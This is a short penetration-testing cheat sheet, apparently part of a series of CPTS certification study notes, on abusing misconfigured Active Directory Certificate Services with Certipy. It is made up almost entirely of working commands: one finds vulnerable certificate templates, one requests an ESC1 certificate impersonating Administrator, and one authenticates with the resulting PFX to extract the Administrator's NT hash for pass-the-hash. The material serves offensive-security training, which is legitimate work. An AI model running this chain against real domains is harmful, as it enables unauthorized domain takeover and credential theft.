Active Directory Certificate Services (AD CS) Abuse
Active Directory Certificate Services (AD CS) misconfiguration discovery and exploitation using Certipy (ESC1-ESC13).
certipypkinit
AD CS provides PKI capabilities for Active Directory. Misconfigured certificate templates grant low-privileged users the ability to impersonate Domain Administrators.
1. Vulnerability Discovery
Scan the domain for vulnerable certificate templates:
certipy find -u {USER}@{DOMAIN} -p "{PASSWORD}" -dc-ip {TARGET_IP} -vulnerable -stdout
2. ESC1 Abuse (Enrollee Supplies Subject / Client Auth)
Request a certificate for Administrator:
certipy req -u {USER}@{DOMAIN} -p "{PASSWORD}" -dc-ip {TARGET_IP} -ca {CA_NAME} -template ESC1_Template -upn Administrator@{DOMAIN}
3. Authenticate & Obtain NT Hash
Authenticate with the generated PFX certificate to extract the Administrator's NT hash:
certipy auth -pfx administrator.pfx -dc-ip {TARGET_IP}
Use the acquired NT hash for Pass-The-Hash execution via 06. Active Directory Attack Paths & Domain Enumeration.
More CPTS notes
- 01. Network Discovery & Port Scanning Guide
- 02. Web Content Discovery & Directory Fuzzing
- 03. Web Application Exploitation & Injection
- 04. Linux Privilege Escalation Master Guide
- 05. Windows Local Privilege Escalation & LOLBAS
- 06. Active Directory Attack Paths & Domain Enumeration
- 07. Kerberos Exploitation: AS-REP & Kerberoasting
- 09. Pivoting, Tunnels & Lateral Movement
- 10. Password Cracking & Hash Identification
- 11. Offensive File Transfers Across Restricted Networks
- 12. Interactive TTY Stabilization & Terminal Spawning
Keep these notes in your own private vault. Open CPTS notes in ZeroBox